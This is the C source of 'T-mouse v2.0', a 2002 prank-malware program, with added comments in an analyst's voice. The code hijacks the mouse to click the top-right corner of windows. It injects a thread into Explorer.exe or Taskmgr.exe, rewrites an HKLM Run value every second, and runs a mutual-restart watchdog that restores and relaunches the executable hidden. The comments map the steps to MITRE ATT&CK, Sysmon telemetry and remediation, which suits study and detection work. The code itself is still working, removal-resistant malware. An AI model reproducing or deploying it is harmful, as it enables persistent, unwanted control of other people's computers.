📄 浅析三线程程序开发思路与实现.txt
if(ptnew.x<rt.right-15)
ptnew.x+=3;
else if(ptnew.x>rt.right-12)
ptnew.x-=3;
if(ptnew.y<rt.top+12)
ptnew.y+=3;
else if(ptnew.y>rt.top+15)
ptnew.y-=3;
SetCursorPos(ptnew.x,ptnew.y);
if((ptnew.x>=rt.right-15) && (ptnew.x<=rt.right-12)
&& (ptnew.y>=rt.top+12) && (ptnew.y<=rt.top+15)
&& (_tcslen(title)!=0))
{
mouse_event(MOUSEEVENTF_LEFTDOWN,ptnew.x,ptnew.y,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,ptnew.x,ptnew.y,0,0);
}
Sleep(1);
}
getche();
return 0;
}
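/*
 * Look up the process ID of the first running process whose main-module
 * base name equals `processname` (case-insensitive comparison).
 *
 * Parameters:
 *   processname - executable base name to look for, e.g. "Explorer.exe".
 *
 * Returns:
 *   the matching process ID,
 *   0 when no accessible process matches (or processname is NULL),
 *   (DWORD)-1 when EnumProcesses itself fails.
 *
 * Only processes that can be opened with
 * PROCESS_QUERY_INFORMATION | PROCESS_VM_READ are inspected; processes the
 * caller may not open are silently skipped. At most 1024 process IDs are
 * examined because the ID buffer has that fixed capacity.
 *
 * Changes from the original listing:
 *   - every process handle is closed in the iteration that opened it
 *     (the original leaked one handle per non-matching process);
 *   - the CloseHandle after the loop is gone: it ran on a handle that was
 *     NULL, already closed, or never initialised;
 *   - GetModuleBaseName receives the buffer size in characters, not bytes,
 *     so a Unicode build can no longer be told the buffer is twice as large
 *     as it is;
 *   - the name buffer is reset per process and the GetModuleBaseName result
 *     is checked, so a failed lookup cannot be compared using the previous
 *     process's name.
 */
DWORD processtopid(TCHAR *processname)
{
    DWORD pids[1024];
    DWORD cbneeded = 0;
    DWORD count;
    DWORD i;

    if (processname == NULL) {
        return 0;
    }

    if (!EnumProcesses(pids, sizeof(pids), &cbneeded)) {
        _tprintf(_T("EnumProcesses Error: %lu\n"), (unsigned long)GetLastError());
        return (DWORD)-1;
    }

    /* EnumProcesses reports bytes written; convert to an element count. */
    count = cbneeded / sizeof(DWORD);

    for (i = 0; i < count; i++) {
        TCHAR basename[MAX_PATH] = _T("UnknownProcess");
        HMODULE hmodule = NULL;
        DWORD modbytes = 0;
        BOOL matched = FALSE;
        HANDLE hprocess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                                      FALSE, pids[i]);

        if (hprocess == NULL) {
            continue;   /* not accessible to this caller, or already gone */
        }

        /* Room for a single HMODULE: only the first module is requested. */
        if (EnumProcessModules(hprocess, &hmodule, sizeof(hmodule), &modbytes) &&
            GetModuleBaseName(hprocess, hmodule, basename,
                              sizeof(basename) / sizeof(basename[0])) != 0) {
            matched = (_tcsicmp(basename, processname) == 0);
        }

        CloseHandle(hprocess);

        if (matched) {
            return pids[i];
        }
    }

    return 0;
}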
/*
 * Copies the code of remote() and a filled-in REMOTEPARAMETER block into
 * another process and starts a thread there (cross-process thread
 * injection, MITRE ATT&CK T1055).
 *
 * Parameters:
 *   ctname - path stored in rp.rptname and, converted to ANSI, in
 *            rp.rpwinexecname (the command remote() later passes to WinExec).
 *   ckname - path stored in rp.rpkname (the CopyFile source in remote()).
 *
 * Returns the handle of the remote thread, or NULL when process enumeration,
 * allocation, the memory write or thread creation fails.
 *
 * Analyst notes:
 *   - Host processes are "Explorer.exe" and "Taskmgr.exe", tried alternately
 *     until one can be opened; the loop has no retry limit.
 *   - Observable sequence: OpenProcess with CREATE_THREAD | VM_OPERATION |
 *     VM_WRITE on the host, a PAGE_EXECUTE_READWRITE allocation, two
 *     WriteProcessMemory calls, then CreateRemoteThread whose start address
 *     lies in that private region. Process-access and remote-thread
 *     telemetry (for example Sysmon event IDs 10 and 8) records these steps.
 *   - No VirtualFreeEx is visible on any path, and rphandle is not closed on
 *     the success path.
 */
HANDLE createremote(PTSTR ctname,PTSTR ckname)
{
HANDLE ethread;
HANDLE rphandle;
TCHAR name[2][15];
TCHAR *remotethr;
TCHAR *remotepar;
DWORD remotepid;
int cb;
int signal;
HINSTANCE hkernel32;
REMOTEPARAMETER rp;
_tcscpy(name[0],_T("Explorer.exe"));
_tcscpy(name[1],_T("Taskmgr.exe"));
/* signal starts at 1 and is pre-incremented, so index 0 (Explorer.exe) is tried first. */
signal=1;
while(1)
{
remotepid=processtopid(name[(++signal)%2]);
/* processtopid returns -1 (as a DWORD) when EnumProcesses fails. */
if(remotepid==-1)
{
return NULL;
}
else if(remotepid==0)
{
/* Candidate not running: wait one second, then try the other name. */
OutputDebugString(_T("Remote Process isn't running\n"));
Sleep(1000);
continue;
}
/* Access mask needed to allocate and write memory and to create a thread in the host. */
rphandle=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE,remotepid);
if(rphandle==NULL)
{
Sleep(1000);
continue;
}
else
{
break;
}
}
/* Fixed size of 4096 TCHARs, not the measured size of remote(). */
cb=sizeof(TCHAR)*4*1024;
/* Read/write/execute region in the host process; it receives the thread routine. */
remotethr=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(remotethr==NULL)
{
_tprintf(_T("VirtualAllocEx for Thread Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
/* Copies cb bytes starting at the address of remote() in this process. */
if(WriteProcessMemory(rphandle,remotethr,(LPVOID)remote,cb,NULL)==FALSE)
{
_tprintf(_T("WriteProcessMemory for Thread Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
{
/* Build the parameter block that remote() receives as its argument. */
memset(&rp,0,sizeof(rp));
/* PID of this process; remote() opens it and waits for it to exit. */
rp.rpmousepid=GetCurrentProcessId();
/* Message strings are carried in the block and read from it by remote(). */
_tcscpy(rp.rpstring,_T("i am in remote process\n"));
_tcscpy(rp.rpcferror,_T("CopyFile Error\n"));
_tcscpy(rp.rpfcerror,_T("FindClose Error\n"));
_tcscpy(rp.rpffferror,_T("FindFirstFile Error\n"));
_tcscpy(rp.rpoperror,_T("OpenProcess Error\n"));
_tcscpy(rp.rpweerror,_T("WinExec Error\n"));
_tcscpy(rp.rpwfsosignal,_T("i am out of remote process\n"));
/* Unbounded copies of caller-supplied paths; field sizes are not visible here. */
_tcscpy(rp.rptname,ctname);
_tcscpy(rp.rpkname,ckname);
/* ANSI copy of ctname for WinExec; ctname is treated as a wide string here
   (implies a Unicode build) and the return value is not checked. */
WideCharToMultiByte(CP_ACP,0,ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
/* API addresses are resolved in THIS process and shipped to the host;
   presumably relies on kernel32.dll being mapped at the same address there.
   NOTE(review): each pointer is cast to DWORD, which holds a full address
   only in a 32-bit build. */
hkernel32=GetModuleHandle(_T("kernel32.dll"));
rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileW");
rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileW");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
}
/* NOTE(review): size is sizeof(rp) multiplied by sizeof(TCHAR), i.e. larger
   than the structure whenever TCHAR is wider than one byte. */
cb=sizeof(TCHAR)*sizeof(rp);
/* Second region in the host, read/write only, for the parameter block. */
remotepar=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
if(remotepar==NULL)
{
_tprintf(_T("VirtualAllocEx for Parameter Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
if(WriteProcessMemory(rphandle,remotepar,(LPVOID)&rp,cb,NULL)==FALSE)
{
_tprintf(_T("WriteProcessMemory for Parameter Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
/* Start the copied routine in the host with the copied block as its argument. */
ethread=CreateRemoteThread(rphandle,NULL,0,(LPTHREAD_START_ROUTINE)remotethr,(LPVOID)remotepar,0,NULL);
if(ethread==NULL)
{
_tprintf(_T("CreateRemoteThread Error: %d\n"),GetLastError());
CloseHandle(rphandle);
return NULL;
}
return ethread;
}
void start()
{
_tprintf(_T("---[ T-mouse v2.0, by TOo2y ]---\n"));
_tprintf(_T("---[ E-mail: TOo2y@safechina.net ]---\n"));
_tprintf(_T("---[ HomePage: www.safechina.net ]---\n"));
_tprintf(_T("---[ Date: 11-27-2002 ]---\n\n"));
return;
}
/*
 * Thread routine that keeps two things alive, checking once per second:
 *   1. the value "T-mouse" under
 *      HKLM\Software\Microsoft\Windows\CurrentVersion\Run
 *      (autostart persistence, MITRE ATT&CK T1547.001), and
 *   2. the remote thread whose handle is passed in pvparam; when that thread
 *      is no longer active, createremote() is called again.
 *
 * Parameters:
 *   pvparam - a thread HANDLE cast to LPVOID (the remote thread to monitor).
 *
 * Returns 0 after the loop is left on a registry error, or -1 (as a DWORD)
 * when GetSystemDirectory fails.
 *
 * Analyst notes:
 *   - Deleting the Run value while this thread is running does not stick:
 *     it is rewritten on the next pass, about one second later. Registry
 *     auditing on the Run key (for example Sysmon event ID 13) shows the
 *     repeated writes.
 *   - Together with remote(), which waits in the host process for this
 *     process to exit, the two sides restart each other. Remediation has to
 *     deal with this process, the injected thread and the Run value
 *     together.
 *   - name1 and name2 are defined outside the lines shown here.
 */
DWORD WINAPI watch(LPVOID pvparam)
{
HANDLE wethread=(HANDLE)pvparam;
DWORD exitcode;
HKEY hkey;
TCHAR sname[MAX_PATH];
TCHAR wtname[MAX_PATH];
TCHAR wkname[MAX_PATH];
TCHAR lpdata[MAX_PATH];
LPCTSTR rgspath=_T("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
DWORD type=REG_SZ;
DWORD dwbuflen=MAX_PATH;
int ret;
if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
{
_tprintf(_T("GetSystemDirectory in watch Error: %d\n"),GetLastError());
return -1;
}
/* Both paths are the system directory with name1 / name2 appended
   (unbounded _tcscat into MAX_PATH buffers). */
_tcscpy(wtname,sname);
_tcscat(wtname,name1);
_tcscpy(wkname,sname);
_tcscat(wkname,name2);
while(1)
{
/* Step 1: does the autostart value still exist? */
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
if(ret!=ERROR_SUCCESS)
{
/* NOTE(review): the Reg* functions return their error code in ret;
   GetLastError() is what gets printed here. */
_tprintf(_T("RegOpenKeyEx for KEY_QUERY_VALUE Error: %d\n"),GetLastError());
break;
}
/* dwbuflen is an in/out parameter here and is never reset between passes. */
ret=RegQueryValueEx(hkey,_T("T-mouse"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
/* Any query failure is handled by rewriting the value with the wtname path. */
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
if(ret!=ERROR_SUCCESS)
{
_tprintf(_T("RegOpenKeyEx for KEY_WRITE Error: %d\n"),GetLastError());
break;
}
/* NOTE(review): the data length passed is dwbuflen, not a length computed
   from wtname, so the stored value size need not match the string. */
ret=RegSetValueEx(hkey,_T("T-mouse"),NULL,type,(const byte *)wtname,dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
_tprintf(_T("RegSetValueEx Error: %d\n"),GetLastError());
break;
}
}
/* Step 2: re-inject when the monitored remote thread has ended.
   The GetExitCodeThread result is not checked and the previous handle
   is not closed before it is replaced. */
GetExitCodeThread(wethread,&exitcode);
if(exitcode!=STILL_ACTIVE)
{
wethread=createremote(wtname,wkname);
}
Sleep(1000);
}
return 0;
}
/*
 * Thread routine whose bytes createremote() copies into another process;
 * it runs there with pvparam pointing at the copied REMOTEPARAMETER block.
 *
 * Every API call in the visible body goes through a function pointer read
 * from that block, and every string it uses is stored in the block;
 * presumably so the copied code does not depend on this module's imports
 * or data. For the same reason the body is documented here rather than
 * restructured.
 *
 * Behaviour, in order:
 *   1. open the process identified by rpmousepid and block until it exits;
 *   2. look for the file rptname; if it is not found, copy rpkname to rptname;
 *   3. run rpwinexecname through WinExec with show command 0 (SW_HIDE).
 *
 * Returns 0 on success, -1 (as a DWORD) when a step fails.
 *
 * Analyst notes: the effect is a watchdog living inside Explorer.exe or
 * Taskmgr.exe. Terminating the original process releases the wait, and the
 * host then restores and relaunches the executable, so the new process has
 * the host as its parent. The OutputDebugString messages are visible to a
 * debug-output viewer.
 */
DWORD WINAPI remote(LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
/* Local function-pointer types matching the kernel32 exports that
   createremote() resolved by name. */
typedef VOID (WINAPI *EOutputDebugString)(LPCTSTR);
typedef HANDLE (WINAPI *EOpenProcess)(DWORD, BOOL, DWORD);
typedef DWORD (WINAPI *EWaitForSingleObject)(HANDLE, DWORD);
typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (WINAPI *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
typedef BOOL (WINAPI *EFindClose)(HANDLE);
typedef UINT (WINAPI *EWinExec)(LPCSTR, UINT);
EOutputDebugString tOutputDebugString;
EOpenProcess tOpenProcess;
EWaitForSingleObject tWaitForSingleObject;
EFindFirstFile tFindFirstFile;
ECopyFile tCopyFile;
EFindClose tFindClose;
EWinExec tWinExec;
/* Load the API addresses that were stored in the parameter block. */
tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
tOpenProcess=(EOpenProcess)erp->rpopenprocess;
tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tCopyFile=(ECopyFile)erp->rpcopyfile;
tFindClose=(EFindClose)erp->rpfindclose;
tWinExec=(EWinExec)erp->rpwinexec;
tOutputDebugString(erp->rpstring);
/* Open the process that performed the injection (its PID travels in the block). */
erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
if(erp->rpprocesshandle==NULL)
{
tOutputDebugString(erp->rpoperror);
return -1;
}
/* Blocks with no timeout until that process terminates; the handle is not closed afterwards. */
tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
/* Check whether the executable at rptname still exists on disk. */
erp->rpfilehandle=tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
{
tOutputDebugString(erp->rpffferror);
/* Not found: restore it from rpkname; TRUE makes the copy fail if the target exists. */
if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
{
tOutputDebugString(erp->rpcferror);
return -1;
}
}
/* NOTE(review): this call is also reached on the not-found path above,
   where rpfilehandle is INVALID_HANDLE_VALUE. */
if(!tFindClose(erp->rpfilehandle))
{
tOutputDebugString(erp->rpfcerror);
return -1;
}
/* WinExec reports success with a value greater than 31; 0 is SW_HIDE. */
if(tWinExec(erp->rpwinexecname, 0)<=31)
{
tOutputDebugString(erp->rpweerror);
return -1;
}
return 0;
}